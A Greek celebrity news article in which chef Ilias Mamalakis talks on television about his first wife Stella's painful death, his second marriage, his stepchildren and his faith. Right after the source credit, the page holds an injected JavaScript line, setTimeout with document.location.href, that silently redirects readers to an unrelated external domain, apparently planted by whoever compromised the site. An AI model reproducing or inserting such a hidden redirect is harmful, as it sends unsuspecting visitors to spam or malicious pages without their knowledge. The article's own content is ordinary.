«Κατάθεση ψυχής» από τον Ηλία Μαμαλάκη: Η Στέλλα «έφυγε» δύσκολα και επώδυνα! Ήταν πάρα πολύ άδικο (ΒΙΝΤΕΟ)

0
75

 

Κατάθεση ψυχής από τον γνωστό σεφ Ηλία Μαμαλάκη, ο οποίος μίλησε στον τηλεοπτικό σταθμό Epsilon και αναφέρθηκε στις δύσκολες στιγμές που έζησε με τον χαμό της πρώτης του συζύγου του Στέλλας, ενώ μιλάει και για τη «νέα» ζωή που έχτισε με τη δεύτερη σύζυγο του.

«Θέλαμε παιδιά, δεν κάναμε παιδιά. Μετά τον δεύτερο γάμο μου, έχω τρία παιδιά, τα οποία αγαπάω πολύ και με αγαπούν πολύ. Ασφαλώς και με θεωρούν σαν δεύτερο πατέρα τους, είμαστε πολύ αγαπημένοι. Αντίπαλος του θανάτου ενός ανθρώπου, δεν έχεις κανέναν άλλον παρά μόνο τον θεό.

Θεώρησα ότι ήταν πάρα πολύ άδικο να “φύγει” από τη ζωή έτσι δύσκολα και επώδυνα η πρώτη μου σύζυγός, η Στέλλα. Υπέφερε πάρα πολύ, ήταν ένας εξαιρετικός άνθρωπος και μου κόστισε πάρα πολύ.

Εγώ έψαχνα για εχθρό εκείνη την ώρα και τα έβαλα με τον θεό. Ο πόνος είναι πόνος, η ανάμνηση είναι ανάμνηση. Όχι, δεν πηγαίνω στην εκκλησία, δεν εξομολογούμαι ποτέ, έχω να μεταλάβω πάρα πολλά χρόνια, αλλά η σχέση μου είναι απευθείας με τον θεό», είπε μεταξύ άλλων ο Ηλίας Μαμαλάκης.

Πηγή: Zappit.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here